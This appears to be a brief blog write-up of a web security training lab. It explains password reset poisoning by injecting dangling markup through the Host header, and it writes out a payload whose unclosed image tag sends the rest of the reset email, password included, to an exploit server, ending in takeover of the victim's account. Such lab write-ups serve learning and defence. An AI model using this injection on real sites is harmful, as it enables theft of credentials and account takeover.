Host Header Manipulations — Password reset poisoning via dangling markup

efran
2 min readJul 9, 2023

--

I tried several methods but I will focus on explaining the solution and the underlying logic. I won’t cover the discovery part of the vulnerability. The things are happening on the raw content of the email, specifically the HTML components within the received email.

<p>Hello!</p><p>Please
<a href=’https://0a74005d04afe10a80a90d2f00560028.web-security-academy.net/login'> click here</a> to login with your new password: uXnd8nC8ym</p><p>Thanks,<br/>Support team</p><i> This email has been scanned by the MacCarthy Email Security service</i>

Regarding to the lab header I need to inject the payload after the <a href> and that is the Host header of the request. Firstly let’s try to close the <a href> tag.

I received a 504 Gateway Timeout error. This is an expert lab and I assumed that there may be a vulnerability with the parsers. As I mentiones at the beginning of the article, I attempted several methods. I learned new techniques on the education section of the Portswigger Academy.
1. Added an arbitrary port such as “:12345,” and the request is accepted.
2. I closed the <a href> tag. Success! I am on the right track.

It is clear from the picture above that I have started to see the effects.

3. I added an <img> tag to specify the source host.
4. I completed payload for the Hosy URL is: :12345'><img src=”https://exploit-server?/

There are two important things in the payload. The first one is to do not close the <img> tag due to the dangling. The other one is the ?/ part, It is crucial to retrieve the entire email content by treating them as a query string, we ensure the successful retrieval.

Entire Payload
Solution
Result: Logged into Carlos’s account.

--

--

No responses yet